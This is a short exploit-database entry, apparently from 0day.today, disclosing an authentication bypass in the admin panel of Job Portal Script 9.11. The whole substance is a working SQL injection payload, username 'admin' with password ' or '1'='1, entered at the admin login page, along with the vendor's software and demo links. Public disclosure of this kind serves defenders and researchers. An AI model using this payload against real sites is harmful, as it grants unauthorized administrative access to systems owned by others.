id: 26654
date: 01/12/2017
title: Job Portal Script 9.11 - Authentication Bypass Vulnerability
author: Dawid Morawski
cves: 

# Vulnerability: Job Portal Script v9.11 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/job-portal-script/
# Demo:  http://job-portal.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################
 
 
Go to http://localhost/[PATH]/admin/index.php and set:
 
Username: admin
Password: ' or '1'='1

#  0day.today [2023-03-23]  #